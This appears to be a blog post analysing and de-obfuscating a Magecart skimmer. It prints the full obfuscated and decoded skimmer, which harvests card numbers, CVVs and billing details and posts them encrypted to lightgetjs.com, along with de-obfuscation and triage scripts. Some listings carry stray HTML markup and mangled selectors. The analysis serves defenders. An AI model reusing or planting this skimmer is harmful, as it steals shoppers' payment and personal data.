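// CONSTRUCTED, benign sample shaped like the pattern (all names hypothetical).
const SAMPLE = [
  'var _0xabc1 = ["bG9n", "aGVsbG8=", "cGF0dGVybg=="];',
  '(function (a, n) { var r = function (c) { while (--c) { a["push"](a["shift"]()); } };',
  '  r(++n); })(_0xabc1, 0x4);',
  'var _0xdec0 = function (k) { k = k - 0x0; return atob(_0xabc1[k]); };',
  'console[_0xdec0("0x2")](_0xdec0("0x0") + " " + _0xdec0("0x1"));',
].join("\n");

// Content layer: the first `var _0x... = [ ... ];` holding string literals.
function extractContent(src) {
  for (const m of src.matchAll(/var\s+(_0x[0-9a-f]+)\s*=\s*\[([^\]]*)\]\s*;/gi)) {
    const tokens = [...m[2].matchAll(/"([^"]*)"|'([^']*)'/g)].map((t) => t[1] ?? t[2]);
    if (tokens.length) return { arrayName: m[1], tokens };
  }
  throw new Error("no string array (Content layer) found");
}

// Preparation step: the IIFE is invoked as `})(arrayName, 0xNN)`.
// Assumption: that argument equals the number of push(shift()) rotations,
// as it does for the 0xa5 call in the sample on this page.
// arrayName matched /_0x[0-9a-f]+/, so it is safe to embed in a RegExp.
function extractShiftCount(src, arrayName) {
  const re = new RegExp("\\}\\s*\\)\\s*\\(\\s*" + arrayName + "\\s*,\\s*(0x[0-9a-f]+|\\d+)\\s*\\)", "i");
  const m = re.exec(src);
  return m ? Number(m[1]) : 0;
}

// Decryption layer: the identifier most often called with a single
// hex-string data key, e.g. name("0x31").
function findDecoder(src) {
  const counts = new Map();
  for (const m of src.matchAll(/\b(_0x[0-9a-f]+)\(\s*["']0x[0-9a-f]+["']\s*\)/gi)) {
    counts.set(m[1], (counts.get(m[1]) || 0) + 1);
  }
  const best = [...counts.entries()].sort((a, b) => b[1] - a[1])[0];
  if (!best) throw new Error("no decoder call sites (Decryption layer) found");
  return best[0];
}

// Same result as `count` push(shift()) rounds, without looping.
function rotateLeft(tokens, count) {
  const k = count % tokens.length;
  return tokens.slice(k).concat(tokens.slice(0, k));
}

// Strict base64 check first: Buffer.from() silently skips invalid characters,
// which would turn a damaged token into plausible-looking garbage.
function decodeToken(token) {
  const b64 = /^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$/;
  return b64.test(token) ? Buffer.from(token, "base64").toString("utf8") : null;
}

// Logic layer: replace every decoder call with the string it would return.
function deobfuscate(src) {
  const { arrayName, tokens } = extractContent(src);
  const shift = extractShiftCount(src, arrayName);
  const decoder = findDecoder(src);
  const strings = rotateLeft(tokens, shift).map(decodeToken);
  const call = new RegExp("\\b" + decoder + "\\(\\s*[\"'](0x[0-9a-f]+)[\"']\\s*\\)", "gi");
  const code = src.replace(call, (whole, key) => {
    const value = strings[Number(key)];
    // Out-of-range keys and undecodable tokens stay visible for manual review.
    return typeof value === "string" ? JSON.stringify(value) : whole;
  });
  return { arrayName, decoder, shift, strings, code };
}

const result = deobfuscate(SAMPLE);
console.log(result.strings); // decoded string table, useful for triage
console.log(result.code);    // script text with decoder calls resolved
```

The decoded `strings` table is usually the fastest triage artifact, since hostnames, form-field names and header names appear there in clear text before the Logic layer has been read at all.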
Magecart Pattern Analysis
Now let’s analyze the Magecart attack code seen above using this pattern (Content, Decryption, Logic).
- Content
  - _0x34d5: an array of data tokens
  - There is a preparation step that shifts the array 165 times (0xa5 === 165).
```javascript
var _0x34d5 = [
  "Q29udGVudC1UeXBl",
  "YXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVk",
  "c2V0UHVibGljS2V5",
  "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",
  "ZW5jcnlwdA==",
  "c2VuZA==",
  "cGxhY2Vfb3JkZXI=",
  "cGxhY2Utb3JkZXI=",
  "cGF5bWVudC1idXR0b25zLWNvbnRhaW5lcg==",
  "YmlsbGluZy1idXR0b25zLWNvbnRhaW5lcg==",
  "cmV2aWV3LWJ1dHRvbnMtY29udGFpbmVy",
  "bGVuZ3Ro",
  "W2lkKj0n",
  "cXVlcnlTZWxlY3RvckFsbA==",
  "YWRkRXZlbnRMaXN0ZW5lcg==",
  "Y2xpY2s=",
  "YnRuLWNoZWNrb3V0",
  "W2NsYXNzKj0n",
  "bG9hZA==",
  "aG9zdG5hbWU=",
  "bG9jYXRpb24=",
  "aW5wdXQ=",
  "aW5kZXhPZg==",
  "X2NjX251bWJlcg==",
  "c3Vic3Ry",
  "dm1fY2NfbnVtYmVy",
  "Z2V0RWxlbWVudEJ5SWQ=",
  "dmFsdWU=",
  "dm1fZXhwaXJhdGlvbg==",
  "X2V4cGlyYXRpb24=",
  "dm1fZXhwaXJhdGlvbl95cg==",
  "X2V4cGlyYXRpb25feXI=",
  "dm1fY2NfY2lk",
  "X2NjX2NpZA==",
  "X2NjX2V4cF9tb250aA==",
  "X2NjX2V4cF95ZWFy",
  "X2NjX2N2dg==",
  "Zmlyc3RuYW1l",
  "bGFzdG5hbWU=",
  "ZW1haWw=",
  "c3RyZWV0MQ==",
  "c3RyZWV0Mg==",
  "Y2l0eQ==",
  "cmVnaW9uX2lk",
  "Y291bnRyeV9pZA==",
  "cG9zdGNvZGU=",
  "dGVsZXBob25l",
  "YmlsbGluZzo=",
  "c3RyaW5naWZ5",
  "dHBzOi8vbGlnaHRnZXRqcy5jb20=",
  "b3Blbg==",
  "UE9TVA==",
  "c2V0UmVxdWVzdEhlYWRlcg==",
];
(function(_0x110cd2, _0xa263bd) {
  var _0x352891 = function(_0x76a704) {
    while (--_0x76a704) {
      _0x110cd2["push"](_0x110cd2["shift"]());
    }
  };
  _0x352891(++_0xa263bd);
})(_0x34d5, 0xa5);
```
- Decryption
  - _0x47fb: a decryption function. In this case the decryption algorithm is a simple atob function (base64 decoding).
  - _0x522b23: data key
  - _0xdb42df: data token
```javascript
var _0x47fb = function(_0x522b23, _0x4fa39c) {
  _0x522b23 = _0x522b23 - 0x0;
  var _0xdb42df = _0x34d5[_0x522b23];
  if (_0x47fb["IyfmVK"] === undefined) {
    (function() {
      var _0x28a5cc = function() {
        var _0x3f5c15;
        try {
          _0x3f5c15 = Function("return\x20(function()\x20" + "{}.constructor(\x22return\x20this\x22)(\x20)" + ");")();
        } catch (_0x7f7a59) {
          _0x3f5c15 = window;
        }
        return _0x3f5c15;
      };
      var _0x1a2269 = _0x28a5cc();
      var _0x2009de = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
      _0x1a2269["atob"] ||
        (_0x1a2269["atob"] = function(_0x2633f6) {
          var _0x1bf8c8 = String(_0x2633f6)["replace"](/=+$/, "");
          for (
            var _0x4e57f1 = 0x0, _0x5122c7, _0x5cb7d8, _0x2540b4 = 0x0, _0x140365 = "";
            (_0x5cb7d8 = _0x1bf8c8["charAt"](_0x2540b4++));
            ~_0x5cb7d8 && ((_0x5122c7 = _0x4e57f1 % 0x4 ? _0x5122c7 * 0x40 + _0x5cb7d8 : _0x5cb7d8), _0x4e57f1++ % 0x4)
              ? (_0x140365 += String["fromCharCode"](0xff & (_0x5122c7 >> ((-0x2 * _0x4e57f1) & 0x6))))
              : 0x0
          ) {
            _0x5cb7d8 = _0x2009de["indexOf"](_0x5cb7d8);
          }
          return _0x140365;
        });
    })();
    _0x47fb["cJuRna"] = function(_0x55fba5) {
      var _0xfd7af3 = atob(_0x55fba5);
      var _0x953b7b = [];
      for (var _0x192361 = 0x0, _0x1f2b27 = _0xfd7af3["length"]; _0x192361 < _0x1f2b27; _0x192361++) {
        _0x953b7b += "%" + ("00" + _0xfd7af3["charCodeAt"](_0x192361)["toString"](0x10))["slice"](-0x2);
      }
      return decodeURIComponent(_0x953b7b);
    };
    _0x47fb["naGzua"] = {};
    _0x47fb["IyfmVK"] = !![];
  }
  var _0x11ff5c = _0x47fb["naGzua"][_0x522b23];
  if (_0x11ff5c === undefined) {
    _0xdb42df = _0x47fb["cJuRna"](_0xdb42df);
    _0x47fb["naGzua"][_0x522b23] = _0xdb42df;
  } else {
    _0xdb42df = _0x11ff5c;
  }
  return _0xdb42df;
};
```
- Logic
  - Executes the main malware part
  - Uses the _0x47fb function to get data values from data keys (‘0x0’, ‘0x1’, ‘0x2’, …)
  - Examples:
    - _0x47fb(‘0x0’); -> “place_order”
    - _0x47fb(‘0x7’); -> “querySelectorAll”
<span class="token keyword">function</span> <span class="token function">readyr</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
<span class="token keyword">var</span> _0x5bbf66 <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x0"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x3"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x4"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> _0x8475c0 <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x2e623e <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x2e623e <span class="token operator"><</span> _0x8475c0<span class="token punctuation">;</span> _0x2e623e<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
f <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span>_0x2e623e<span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
k <span class="token operator">=</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x6"</span><span class="token punctuation">)</span> <span class="token operator">+</span> f <span class="token operator">+</span> <span class="token string">"x27]"</span><span class="token punctuation">;</span>
        var _0x7ddc45 = document[_0x47fb("0x7")](k),
          _0x5d458a = 0x0;
        for (; _0x5d458a < _0x7ddc45[_0x47fb("0x5")]; _0x5d458a++) {
          _0x7ddc45[_0x5d458a][_0x47fb("0x8")](_0x47fb("0x9"), bts);
        }
      } catch (_0x375bef) {}
    }
  } catch (_0x36add6) {}
  try {
    var _0x5bbf66 = [_0x47fb("0xa")];
    var _0x8475c0 = _0x5bbf66[_0x47fb("0x5")];
    for (var _0x2e623e = 0x0; _0x2e623e < _0x8475c0; _0x2e623e++) {
      f = _0x5bbf66[_0x2e623e];
      try {
        k = _0x47fb("0xb") + f + "x27]";
        var _0x7ddc45 = document[_0x47fb("0x7")](k),
          _0x5d458a = 0x0;
        for (; _0x5d458a < _0x7ddc45[_0x47fb("0x5")]; _0x5d458a++) {
          _0x7ddc45[_0x5d458a][_0x47fb("0x8")](_0x47fb("0x9"), bts);
        }
      } catch (_0x24b4f5) {}
    }
  } catch (_0x196a93) {}
}
window[_0x47fb("0x8")](_0x47fb("0xc"), readyr);
setInterval(bts, 0x7d0);
var vvk = "";
function bts() {
  try {
    var _0x34f9e9 = {};
    _0x34f9e9[_0x47fb("0xd")] = window[_0x47fb("0xe")][_0x47fb("0xd")];
    var _0x4a60b2 = document[_0x47fb("0x7")](_0x47fb("0xf"));
    var _0x570cfd = _0x4a60b2[_0x47fb("0x5")];
    var _0x57a5b3 = "";
    for (var _0x1e5f96 = 0x0; _0x1e5f96 < _0x570cfd; _0x1e5f96++) {
      el = _0x4a60b2[_0x1e5f96]["id"];
      pos = el[_0x47fb("0x10")](_0x47fb("0x11"));
      if (pos > 0x0) {
        _0x57a5b3 = el[_0x47fb("0x12")](0x0, pos);
      }
    }
    if (!_0x57a5b3) return;
    var _0x553440 = _0x57a5b3;
    try {
      _0x34f9e9[_0x47fb("0x13")] = document[_0x47fb("0x14")](_0x553440 + _0x47fb("0x11"))[_0x47fb("0x15")];
    } catch (_0x1f7150) {}
    if (!_0x34f9e9[_0x47fb("0x13")]) return;
    try {
      _0x34f9e9[_0x47fb("0x16")] = document[_0x47fb("0x14")](_0x553440 + _0x47fb("0x17"))[_0x47fb("0x15")];
    } catch (_0x136215) {}
    try {
      _0x34f9e9[_0x47fb("0x18")] = document[_0x47fb("0x14")](_0x553440 + _0x47fb("0x19"))[_0x47fb("0x15")];
    } catch (_0x4ab22b) {}
    try {
      _0x34f9e9[_0x47fb("0x1a")] = document[_0x47fb("0x14")](_0x553440 + _0x47fb("0x1b"))[_0x47fb("0x15")];
    } catch (_0x4df1f0) {}
    try {
      if (!_0x34f9e9[_0x47fb("0x16")]) {
        _0x34f9e9[_0x47fb("0x16")] = document[_0x47fb("0x14")](_0x553440 + _0x47fb("0x1c"))[_0x47fb("0x15")];
      }
    } catch (_0x90cd50) {}
    try {
      if (!_0x34f9e9[_0x47fb("0x18")]) {
        _0x34f9e9[_0x47fb("0x18")] = document[_0x47fb("0x14")](_0x553440 + _0x47fb("0x1d"))[_0x47fb("0x15")];
      }
    } catch (_0x188c28) {}
    try {
      if (!_0x34f9e9[_0x47fb("0x1a")]) {
        _0x34f9e9[_0x47fb("0x1a")] = document[_0x47fb("0x14")](_0x553440 + _0x47fb("0x1e"))[_0x47fb("0x15")];
      }
    } catch (_0x32a59b) {}
    var _0x1e9e38 = 0x0;
    if (_0x34f9e9[_0x47fb("0x13")][_0x47fb("0x5")] == 0xf && _0x34f9e9[_0x47fb("0x1a")][_0x47fb("0x5")] > 0x3)
      _0x1e9e38 = 0x1;
    if (_0x34f9e9[_0x47fb("0x13")][_0x47fb("0x5")] > 0xf && _0x34f9e9[_0x47fb("0x1a")][_0x47fb("0x5")] >= 0x3)
      _0x1e9e38 = 0x1;
    if (!_0x1e9e38) return;
    var _0xe078a8 = [
      _0x47fb("0x1f"),
      _0x47fb("0x20"),
      _0x47fb("0x21"),
      _0x47fb("0x22"),
      _0x47fb("0x23"),
      _0x47fb("0x24"),
      _0x47fb("0x25"),
      _0x47fb("0x26"),
      _0x47fb("0x27"),
      _0x47fb("0x28"),
    ];
    _0x570cfd = _0xe078a8[_0x47fb("0x5")];
    for (var _0x1e5f96 = 0x0; _0x1e5f96 < _0x570cfd; _0x1e5f96++) {
      _0x553440 = _0xe078a8[_0x1e5f96];
      k = _0x47fb("0x29") + _0x553440;
      try {
        _0x34f9e9[_0x553440] = document[_0x47fb("0x14")](k)[_0x47fb("0x15")];
      } catch (_0x12e01e) {}
    }
    if (!_0x34f9e9[_0x47fb("0x27")]) return;
    if (_0x1e9e38) {
      _0x34f9e9 = JSON[_0x47fb("0x2a")](_0x34f9e9);
      if (_0x34f9e9[_0x47fb("0x5")] == vvk[_0x47fb("0x5")]) return;
      vvk = _0x34f9e9;
      var _0x4c73bd = new XMLHttpRequest();
      url = "ht" + _0x47fb("0x2b");
      _0x4c73bd[_0x47fb("0x2c")](_0x47fb("0x2d"), url + "", ![]);
      _0x4c73bd[_0x47fb("0x2e")](_0x47fb("0x2f"), _0x47fb("0x30"));
<span class="token keyword">var</span> _0xd96713 <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">JSEncrypt</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
_0xd96713<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x31"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x32"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> _0x5dc551 <span class="token operator">=</span> _0xd96713<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x33"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">)</span><span class="token punctuation">;</span>
_0x4c73bd<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x34"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"k="</span> <span class="token operator">+</span> _0x5dc551<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x2661d6<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token punctuation">}</span>
Magecart Attack De-obfuscation
Once you have separated the layers of the malware, you can reveal its code in two simple steps:
- Execute the Content and the Decryption layers in a sandboxed JavaScript environment
- Evaluate the Decryption calls with the data keys
You can automate the de-obfuscation procedure with the following Node.js script. Note: this code is a proof of concept.
const fs = require("fs");

// In our example DECRYPTION_FUNCTION_NAME === '_0x47fb'
const DECRYPTION_FUNCTION_NAME = "_0x47fb";
// Placeholder paths (assumed names): the file with the obfuscated code and the output file
const MAGECART_CONTENT_PATH = "./magecart_content.js";
const OUTPUT_PATH = "./magecart_deobfuscated.js";
// Match a single call to the decryption function, e.g. _0x47fb('0x0')
const DECRYPTION_FUNCTION_REGEX = new RegExp(`${DECRYPTION_FUNCTION_NAME}\\(.*?\\)`, "g");

//<Content Code Here>
//<Parser Code Here>

deobfuscateMagecart();

function deobfuscateMagecart() {
  let code = fs.readFileSync(MAGECART_CONTENT_PATH, { encoding: "utf-8" });
  // eval() runs the sample's own decryption code: use a sandboxed environment only
  let match;
  while ((match = DECRYPTION_FUNCTION_REGEX.exec(code)) !== null) {
    const decryptionFunctionCall = match[0]; // e.g. _0x47fb('0x0')
    const dataValue = eval(decryptionFunctionCall);
    // Replace decryption call with evaluated value, emitted as a valid string literal
    code = code.replace(decryptionFunctionCall, () => JSON.stringify(dataValue));
    // The source changed, so restart the search from the beginning
    DECRYPTION_FUNCTION_REGEX.lastIndex = 0;
  }
  fs.writeFileSync(OUTPUT_PATH, code);
}
This is the output of the automated de-obfuscation script. As you can see, ALL of the strings are revealed, and it is much easier to understand what Magecart actually does.
function readyr() {
  try {
    var _0x5bbf66 = [
      "place_order",
      "place-order",
      "payment-buttons-container",
      "billing-buttons-container",
      "review-buttons-container",
    ];
    var _0x8475c0 = _0x5bbf66["length"];
    for (var _0x2e623e = 0x0; _0x2e623e < _0x8475c0; _0x2e623e++) {
      f = _0x5bbf66[_0x2e623e];
      try {
        k = "[id*='" + f + "x27]";
        var _0x7ddc45 = document["querySelectorAll"](k),
          _0x5d458a = 0x0;
        for (; _0x5d458a < _0x7ddc45["length"]; _0x5d458a++) {
          _0x7ddc45[_0x5d458a]["addEventListener"]("click", bts);
        }
      } catch (_0x375bef) {}
    }
  } catch (_0x36add6) {}
  try {
    var _0x5bbf66 = ["btn-checkout"];
    var _0x8475c0 = _0x5bbf66["length"];
    for (var _0x2e623e = 0x0; _0x2e623e < _0x8475c0; _0x2e623e++) {
      f = _0x5bbf66[_0x2e623e];
      try {
        k = "[class*='" + f + "x27]";
        var _0x7ddc45 = document["querySelectorAll"](k),
          _0x5d458a = 0x0;
        for (; _0x5d458a < _0x7ddc45["length"]; _0x5d458a++) {
          _0x7ddc45[_0x5d458a]["addEventListener"]("click", bts);
        }
      } catch (_0x24b4f5) {}
    }
  } catch (_0x196a93) {}
}
window["addEventListener"]("load", readyr);
setInterval(bts, 0x7d0);
var vvk = "";
function bts() {
  try {
    var _0x34f9e9 = {};
    _0x34f9e9["hostname"] = window["location"]["hostname"];
    var _0x4a60b2 = document["querySelectorAll"]("input");
    var _0x570cfd = _0x4a60b2["length"];
    var _0x57a5b3 = "";
    for (var _0x1e5f96 = 0x0; _0x1e5f96 < _0x570cfd; _0x1e5f96++) {
      el = _0x4a60b2[_0x1e5f96]["id"];
      pos = el["indexOf"]("_cc_number");
      if (pos > 0x0) {
        _0x57a5b3 = el["substr"](0x0, pos);
      }
    }
    if (!_0x57a5b3) return;
    var _0x553440 = _0x57a5b3;
    try {
      _0x34f9e9["vm_cc_number"] = document["getElementById"](_0x553440 + "_cc_number")["value"];
    } catch (_0x1f7150) {}
    if (!_0x34f9e9["vm_cc_number"]) return;
    try {
      _0x34f9e9["vm_expiration"] = document["getElementById"](_0x553440 + "_expiration")["value"];
    } catch (_0x136215) {}
    try {
      _0x34f9e9["vm_expiration_yr"] = document["getElementById"](_0x553440 + "_expiration_yr")["value"];
    } catch (_0x4ab22b) {}
    try {
      _0x34f9e9["vm_cc_cid"] = document["getElementById"](_0x553440 + "_cc_cid")["value"];
    } catch (_0x4df1f0) {}
    try {
      if (!_0x34f9e9["vm_expiration"]) {
        _0x34f9e9["vm_expiration"] = document["getElementById"](_0x553440 + "_cc_exp_month")["value"];
      }
    } catch (_0x90cd50) {}
    try {
      if (!_0x34f9e9["vm_expiration_yr"]) {
        _0x34f9e9["vm_expiration_yr"] = document["getElementById"](_0x553440 + "_cc_exp_year")["value"];
      }
    } catch (_0x188c28) {}
    try {
      if (!_0x34f9e9["vm_cc_cid"]) {
        _0x34f9e9["vm_cc_cid"] = document["getElementById"](_0x553440 + "_cc_cvv")["value"];
      }
    } catch (_0x32a59b) {}
    var _0x1e9e38 = 0x0;
    if (_0x34f9e9["vm_cc_number"]["length"] == 0xf && _0x34f9e9["vm_cc_cid"]["length"] > 0x3) _0x1e9e38 = 0x1;
    if (_0x34f9e9["vm_cc_number"]["length"] > 0xf && _0x34f9e9["vm_cc_cid"]["length"] >= 0x3) _0x1e9e38 = 0x1;
    if (!_0x1e9e38) return;
    var _0xe078a8 = [
      "firstname",
      "lastname",
      "email",
      "street1",
      "street2",
      "city",
      "region_id",
      "country_id",
<span class="token string">"postcode"</span><span class="token punctuation">,</span>
<span class="token string">"telephone"</span><span class="token punctuation">,</span>
<span class="token punctuation">]</span><span class="token punctuation">;</span>
_0x570cfd <span class="token operator">=</span> _0xe078a8<span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x1e5f96 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x1e5f96 <span class="token operator"><</span> _0x570cfd<span class="token punctuation">;</span> _0x1e5f96<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
_0x553440 <span class="token operator">=</span> _0xe078a8<span class="token punctuation">[</span>_0x1e5f96<span class="token punctuation">]</span><span class="token punctuation">;</span>
k <span class="token operator">=</span> <span class="token string">"billing:"</span> <span class="token operator">+</span> _0x553440<span class="token punctuation">;</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
_0x34f9e9<span class="token punctuation">[</span>_0x553440<span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token string">"getElementById"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>k<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"value"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x12e01e<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token string">"postcode"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>_0x1e9e38<span class="token punctuation">)</span> <span class="token punctuation">{</span>
_0x34f9e9 <span class="token operator">=</span> <span class="token constant">JSON</span><span class="token punctuation">[</span><span class="token string">"stringify"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span> <span class="token operator">==</span> vvk<span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
vvk <span class="token operator">=</span> _0x34f9e9<span class="token punctuation">;</span>
<span class="token keyword">var</span> _0x4c73bd <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">XMLHttpRequest</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
url <span class="token operator">=</span> <span class="token string">"ht"</span> <span class="token operator">+</span> <span class="token string">"tps://lightgetjs.com"</span><span class="token punctuation">;</span>
_0x4c73bd<span class="token punctuation">[</span><span class="token string">"open"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"POST"</span><span class="token punctuation">,</span> url <span class="token operator">+</span> <span class="token string">""</span><span class="token punctuation">,</span> <span class="token operator">!</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
_0x4c73bd<span class="token punctuation">[</span><span class="token string">"setRequestHeader"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"Content-Type"</span><span class="token punctuation">,</span> <span class="token string">"application/x-www-form-urlencoded"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> _0xd96713 <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">JSEncrypt</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
_0xd96713<span class="token punctuation">[</span><span class="token string">"setPublicKey"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>
<span class="token string">"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"</span>
<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> _0x5dc551 <span class="token operator">=</span> _0xd96713<span class="token punctuation">[</span><span class="token string">"encrypt"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">)</span><span class="token punctuation">;</span>
_0x4c73bd<span class="token punctuation">[</span><span class="token string">"send"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"k="</span> <span class="token operator">+</span> _0x5dc551<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x2661d6<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token punctuation">}</span>
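The decoded sample above shows three things a defender can look for without running the script: payment-field identifiers, a network sink, and a destination URL split across string concatenation so that a plain search for `https://` misses it. The following is an added example for Node.js, not code from the original post; `triage`, `tryBase64`, the rule names and the allow-listed host `shop.example` are assumptions for illustration, and the matching is regex-based heuristics rather than a JavaScript parser.

```javascript
// Added example: regex-based triage of string literals; nothing is executed.
const RULES = [
  { tag: "reads-card-field", re: /_cc_|cc_(number|cid|cvv)/i },
  { tag: "network-sink", re: /^(XMLHttpRequest|send|sendBeacon|fetch)$/ },
  { tag: "client-side-crypto", re: /^(JSEncrypt|setPublicKey|encrypt)$/ },
];

// Return the decoded text only for canonical base64 that yields printable ASCII.
function tryBase64(s) {
  if (s.length < 4 || s.length % 4 !== 0 || !/^[A-Za-z0-9+\/]+={0,2}$/.test(s)) return null;
  const out = Buffer.from(s, "base64").toString("latin1");
  return /^[\x20-\x7e]+$/.test(out) ? out : null;
}

function triage(source, allowedHosts) {
  // Fold "a" + "b" into "ab" so a split URL such as "ht" + "tps://..." reappears.
  let folded = source, prev;
  do {
    prev = folded;
    folded = folded.replace(/"([^"\\]*)"\s*\+\s*"([^"\\]*)"/g, '"$1$2"');
  } while (folded !== prev);
  const literals = [...folded.matchAll(/"([^"\\]*)"/g)].map((m) => m[1]);
  // Keep each literal and, where it decodes, its base64 plaintext as well.
  const tokens = literals.flatMap((s) => [s, tryBase64(s)].filter((t) => t !== null));
  // Bare identifiers matter too: new XMLHttpRequest(), new JSEncrypt().
  const idents = folded.replace(/"[^"\\]*"/g, " ").match(/[A-Za-z_$][\w$]*/g) || [];

  const tags = new Set();
  for (const tok of [...tokens, ...idents])
    for (const r of RULES) if (r.re.test(tok)) tags.add(r.tag);

  const unknownHosts = new Set();
  for (const tok of tokens) {
    const m = /^https?:\/\/([^\/:?#]+)/i.exec(tok);
    if (m && !allowedHosts.includes(m[1].toLowerCase())) unknownHosts.add(m[1].toLowerCase());
  }
  return { tags: [...tags].sort(), unknownHosts: [...unknownHosts] };
}

// Constructed sample: lines in the shape of the decoded skimmer above, plus two
// base64 entries of the kind its string array holds.
const SAMPLE = [
  'var _0x34d5 = ["ZW5jcnlwdA==", "c2VuZA=="];',
  'd["vm_cc_number"] = document["getElementById"](p + "_cc_number")["value"];',
  "var x = new XMLHttpRequest();",
  'url = "ht" + "tps://lightgetjs.com";',
  'x["open"]("POST", url + "", ![]);',
].join("\n");
console.log(triage(SAMPLE, ["shop.example"]));
```

A script that raises all three tags together with a host outside the site's allow-list is a strong candidate for manual review; any one tag alone is common in legitimate checkout code.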
Thank you for reading, and stay tuned for the next post where I’ll be focusing on more advanced techniques to analyze Magecart malware, and malicious code in general.
Disclaimers:
- I don’t recommend executing any unfamiliar code in your local environment without knowing what you’re doing.
- Malware comes in all shapes and colors, and this post discusses a commonly found Magecart script structure. This is not an exhaustive analysis of all possible code injection techniques.